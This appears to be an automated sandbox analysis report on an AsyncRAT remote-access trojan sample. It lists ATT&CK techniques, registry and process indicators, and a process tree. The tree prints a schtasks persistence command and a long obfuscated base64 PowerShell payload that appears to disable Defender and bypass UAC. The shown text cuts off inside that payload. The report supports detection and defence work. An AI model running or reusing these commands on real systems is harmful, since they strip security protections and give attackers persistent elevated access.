asyncrat | f22ec9c2df8efd42827f0c23c3a47c5cd776e2213cad5f1e067c4f2e4ac0cebe

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2120 created 1356	2120	powershell.exe	101

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	Windows.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	Windows.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	Windows.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0008000000023470-9.dat	family_asyncrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2872	netsh.exe
5032	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Windows.exe

Deletes itself 1 IoCs

pid	Process
3404	Windows.exe

Executes dropped EXE 2 IoCs

pid	Process
3404	Windows.exe
3256	Client.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

persistence privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua	Windows.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	Windows.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2528	powershell.exe
2240	powershell.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1016	ARP.EXE

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3556	tasklist.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2672	sc.exe
1232	sc.exe
668	sc.exe
4596	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3296	NETSTAT.EXE

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1972	WMIC.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4632	timeout.exe
2824	timeout.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5064	ipconfig.exe
3296	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
3220	systeminfo.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4192	schtasks.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
1920	Client.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
2240	powershell.exe
2240	powershell.exe
2240	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
3404	Windows.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1920	Client.exe
Token: SeDebugPrivilege	3404	Windows.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	5068	whoami.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	3264	whoami.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	3256	Client.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1920 wrote to memory of 2316	1920	Client.exe	89
PID 1920 wrote to memory of 2316	1920	Client.exe	89
PID 1920 wrote to memory of 4024	1920	Client.exe	91
PID 1920 wrote to memory of 4024	1920	Client.exe	91
PID 4024 wrote to memory of 2824	4024	cmd.exe	93
PID 4024 wrote to memory of 2824	4024	cmd.exe	93
PID 2316 wrote to memory of 4192	2316	cmd.exe	94
PID 2316 wrote to memory of 4192	2316	cmd.exe	94
PID 4024 wrote to memory of 3404	4024	cmd.exe	100
PID 4024 wrote to memory of 3404	4024	cmd.exe	100
PID 3404 wrote to memory of 2120	3404	Windows.exe	104
PID 3404 wrote to memory of 2120	3404	Windows.exe	104
PID 2120 wrote to memory of 4596	2120	powershell.exe	106
PID 2120 wrote to memory of 4596	2120	powershell.exe	106
PID 2120 wrote to memory of 2296	2120	powershell.exe	107
PID 2120 wrote to memory of 2296	2120	powershell.exe	107
PID 2120 wrote to memory of 5068	2120	powershell.exe	109
PID 2120 wrote to memory of 5068	2120	powershell.exe	109
PID 2120 wrote to memory of 4608	2120	powershell.exe	110
PID 2120 wrote to memory of 4608	2120	powershell.exe	110
PID 2120 wrote to memory of 2240	2120	powershell.exe	111
PID 2120 wrote to memory of 2240	2120	powershell.exe	111
PID 2240 wrote to memory of 2672	2240	powershell.exe	113
PID 2240 wrote to memory of 2672	2240	powershell.exe	113
PID 2240 wrote to memory of 4604	2240	powershell.exe	114
PID 2240 wrote to memory of 4604	2240	powershell.exe	114
PID 2240 wrote to memory of 3264	2240	powershell.exe	116
PID 2240 wrote to memory of 3264	2240	powershell.exe	116
PID 2240 wrote to memory of 4376	2240	powershell.exe	117
PID 2240 wrote to memory of 4376	2240	powershell.exe	117
PID 2240 wrote to memory of 1232	2240	powershell.exe	118
PID 2240 wrote to memory of 1232	2240	powershell.exe	118
PID 3404 wrote to memory of 3248	3404	Windows.exe	122
PID 3404 wrote to memory of 3248	3404	Windows.exe	122
PID 3248 wrote to memory of 2528	3248	cmd.exe	124
PID 3248 wrote to memory of 2528	3248	cmd.exe	124
PID 2528 wrote to memory of 3256	2528	powershell.exe	125
PID 2528 wrote to memory of 3256	2528	powershell.exe	125
PID 3404 wrote to memory of 4020	3404	Windows.exe	140
PID 3404 wrote to memory of 4020	3404	Windows.exe	140
PID 4020 wrote to memory of 3220	4020	cmd.exe	142
PID 4020 wrote to memory of 3220	4020	cmd.exe	142
PID 4020 wrote to memory of 2544	4020	cmd.exe	147
PID 4020 wrote to memory of 2544	4020	cmd.exe	147
PID 4020 wrote to memory of 1972	4020	cmd.exe	148
PID 4020 wrote to memory of 1972	4020	cmd.exe	148
PID 4020 wrote to memory of 3800	4020	cmd.exe	149
PID 4020 wrote to memory of 3800	4020	cmd.exe	149
PID 3800 wrote to memory of 4996	3800	net.exe	150
PID 3800 wrote to memory of 4996	3800	net.exe	150
PID 4020 wrote to memory of 2812	4020	cmd.exe	151
PID 4020 wrote to memory of 2812	4020	cmd.exe	151
PID 2812 wrote to memory of 516	2812	query.exe	152
PID 2812 wrote to memory of 516	2812	query.exe	152
PID 4020 wrote to memory of 5080	4020	cmd.exe	153
PID 4020 wrote to memory of 5080	4020	cmd.exe	153
PID 5080 wrote to memory of 804	5080	net.exe	154
PID 5080 wrote to memory of 804	5080	net.exe	154
PID 4020 wrote to memory of 900	4020	cmd.exe	155
PID 4020 wrote to memory of 900	4020	cmd.exe	155
PID 900 wrote to memory of 1444	900	net.exe	156
PID 900 wrote to memory of 1444	900	net.exe	156
PID 4020 wrote to memory of 4480	4020	cmd.exe	157
PID 4020 wrote to memory of 4480	4020	cmd.exe	157

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	Windows.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	Windows.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	Windows.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC43A.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2824
- - C:\Users\Admin\AppData\Roaming\Windows.exe
    "C:\Users\Admin\AppData\Roaming\Windows.exe"
    3⤵
    - UAC bypass
    - Checks computer location settings
    - Deletes itself
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:3404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAc